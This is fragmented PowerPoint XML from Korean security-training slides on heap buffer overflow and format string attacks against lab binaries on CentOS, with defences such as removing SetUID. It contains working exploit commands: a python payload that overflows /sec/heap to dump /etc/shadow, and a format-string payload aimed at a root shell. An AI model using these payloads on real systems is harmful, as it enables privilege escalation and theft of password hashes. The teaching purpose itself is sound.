              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용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cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>goodfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4) /sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행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/sec/heap AAAA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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트임을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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571A0F24-991F-415E-A73C-B4EAAC477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50" y="1308062"/>
            <a:ext cx="3931920" cy="67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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16244EA-4DD3-4DB4-82AB-E12B21602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50" y="2572320"/>
            <a:ext cx="4954143" cy="275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96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE197C-F394-412F-8A5A-427406107D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5" t="7386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="5778500"/>
            <a:ext cx="3059320" cy="50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98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE075564-BEE4-4DC3-AF46-CA34416639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7" t="2533" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303893" y="852446"/>
            <a:ext cx="3729355" cy="126259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2514E9-35C9-4437-B2C6-2C1F069FC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220895"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6303893" y="2416397"/>
          <a:ext cx="4932807" cy="2686495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588396129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712301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="21920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strcpy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실행 후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힙의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구조는 다음과 같다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114587"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57345" name="_x570528760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D34F5E5-1CDA-4753-B23F-F4B742DB7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727" y="3007517"/>
            <a:ext cx="4783138" cy="188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2064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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>힙 버퍼 오버플로우 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 수정할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/heap $(python -c 'print "A"*112+"B"') &gt; 1.txt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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 실행 결과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cat 1.txt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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라는 파일을 열 수 없었음을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7)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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력되도록 공격 수행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/sec/heap $(python -c 'print "A"*112+"/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/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD377966-9EB2-46A2-8812-AD29643EC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" t="323" r="721" b="158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504826" y="862012"/>
            <a:ext cx="4852987" cy="2705101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19AB127-0D1E-49DE-AA80-E2C09252F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585511"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="504826" y="3632427"/>
          <a:ext cx="4932807" cy="2784276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1563084074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2552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791167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="252906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strcpy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실행 후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힙의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구조는 다음과 같다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buf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버퍼 시작 주소로부터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A’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문자가 복사되며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buf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버퍼의 시작 주소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+ 112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B’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복사된다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568446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59393" name="_x603817952">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266AA15A-B8BA-445A-9A33-16961264F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97" y="4473906"/>
            <a:ext cx="4593352" cy="180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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E22925-E979-45D6-8626-2DA803E7AD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0" t="1826" r="101" b="451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="862012"/>
            <a:ext cx="490537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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9FE55-DBD5-4F0D-A63F-B2351D7BB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741" y="2811778"/>
            <a:ext cx="4934204" cy="274662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44762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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 공격 결과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cat 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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7321A60-9A8B-4DCF-B6BE-E0B5E85C5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238139"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="513016" y="490569"/>
          <a:ext cx="5049584" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5049584">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3417638965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645710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="22031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strcpy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실행 후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힙의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구조는 다음과 같다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509503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60417" name="_x609432040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A00DFC-BC0A-404C-A5D1-E832A2A53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10" y="1092518"/>
            <a:ext cx="4811713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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B1E8A-1EFD-4FFC-BD3E-A7127DA4D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16" y="3608229"/>
            <a:ext cx="4992116" cy="275920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C682B9-F1E2-456F-BB10-FF556080591D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck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/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2.txt)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044337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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EB15F0-8F52-4084-8228-4234399B1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hlinkClick r:id="rId3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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF –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힙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-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대응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/sec/heap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파일에는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버퍼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취약점이 존재한다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버퍼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오버플로우가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발생하더라도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권한이 없는 파일의 내용이 출력되지 않도록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1)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SetUID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제거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chmod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u-s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파일명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Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA32BEB-9045-401B-B976-A8DE580FE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C69DC5-6D46-4110-B092-F87162F11C2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 err="1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BOF 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BOF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취약점에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250E706-7320-4890-B2A5-9F511E31CF36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6F75AFA-6CA9-432C-B149-D4CF8BED7C7C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21" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F042198-8D3B-42BA-9AB0-F321EFE2DD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27DCE4-1233-4F8B-B02D-73786CA1D8E6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(CentOS)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54417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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd /sec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2) /sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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ls –l heap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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제 및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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> u-s /sec/heap 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ls –l heap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4648275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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217BE02-C249-4B5F-B814-9FDE58ECBC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9" t="2896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="1327150"/>
            <a:ext cx="3932555" cy="6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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A268674-ACB5-47FC-8FAB-D5A054A14C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5" t="7026"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="2770129"/>
            <a:ext cx="3977321" cy="6588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F01A300-EBE6-4B42-B0BD-D37242AA4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136661"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="498209"/>
          <a:ext cx="4932807" cy="4393375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1604440188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504514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="392925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ASLR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활성화로는 대응이 되지 않는다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이유는 다음과 같이 두 버퍼들 간의 거리는 일정하게 유지되기 때문이다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311618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61441" name="_x563165400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC678E34-4942-49FE-B9D0-0104EB14B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981" y="1252979"/>
            <a:ext cx="3870325" cy="341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CAEABC-BB50-468C-9324-155014192660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5146484"/>
            <a:ext cx="5616792" cy="13425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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check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97695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/Training/Unit/Sys/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. Format String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격 및 방어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/sec/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fmstring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파일에는 포맷 스트링 취약점이 존재한다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이를 이용하여 루트 쉘을 획득하여라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pass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변수의 값이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144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되면 루트 쉘을 획득할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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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test / test123</a:t>
            </a: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바이너리 파일 역어셈블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objdump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-M intel -d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파일명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포맷 스트링 취약점을 이용한 공격을 수행할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포맷 스트링 공격에 대응할 수 있다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(CentOS5.5)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210927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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd /sec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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일 및 취약한 부분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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용으로 포맷 스트링 취약점이 존재함을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 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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이면 루트 권한 쉘을 얻을 수 있음을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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 취약한 부분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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | more</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDDCC5-5EEB-4A7D-AA72-66E76071A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3" y="1308062"/>
            <a:ext cx="4970272" cy="264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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727F43-D33E-4A48-AFB1-B318A79B8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899" y="481127"/>
            <a:ext cx="4970399" cy="270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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4965C47-8AF6-484B-821C-5976345E9E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52" r="353"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315590" y="4046737"/>
            <a:ext cx="4927016" cy="2330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74144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4) /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> A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pass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변수의 주소는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0xbfffead0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 주소는 일부 변경될 수 있음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5) pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 준비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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print   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    "\xd0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x“’)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%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0xbfffeaa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자 길이에 따라 변경될 수 있음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A0EFEB4-AA1E-4B58-9FBC-FD9B7F5B1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448156"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497191" y="442099"/>
          <a:ext cx="4009639" cy="4624509"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4009639">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3874176564"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20016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2648" marR="52648" marT="14556" marB="145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640343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415117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snprintf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진입 시점에서의 스택 구조는 다음과 같다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648" marR="52648" marT="14556" marB="145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499081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63489" name="_x617086112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D643E2-0914-4348-BAF3-4D3A333DB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" r="492" b="3080"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682117" y="914402"/>
            <a:ext cx="3221974" cy="409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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908F26EA-D7C6-4555-AAE7-A403C0950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91" y="5536756"/>
            <a:ext cx="4935093" cy="653923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B1E0E57-DBFB-4883-AA1C-049CABDDF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929117"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6269429" y="442099"/>
          <a:ext cx="4932807" cy="4150233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3594700888"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23050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47818"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="388197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위의 예제에서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snprintf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진입 시의 스택 구조는 다음과 같다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863989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63491" name="_x617765528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918F0D9E-653E-406B-BAF4-FA91A13F8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944" y="954128"/>
            <a:ext cx="480377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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408F8867-D6D3-4DBD-92F8-8F6CBA5836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3" t="4059" r="833" b="3893"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6269429" y="5343526"/>
            <a:ext cx="4868292" cy="69532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3733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97A156-4D8D-4AC0-A570-59C6AB549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784323"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="487602" y="437382"/>
          <a:ext cx="5381390" cy="4204921"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5381390">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3880889392"/>
                    </a:ext>
                  </a:extLst>
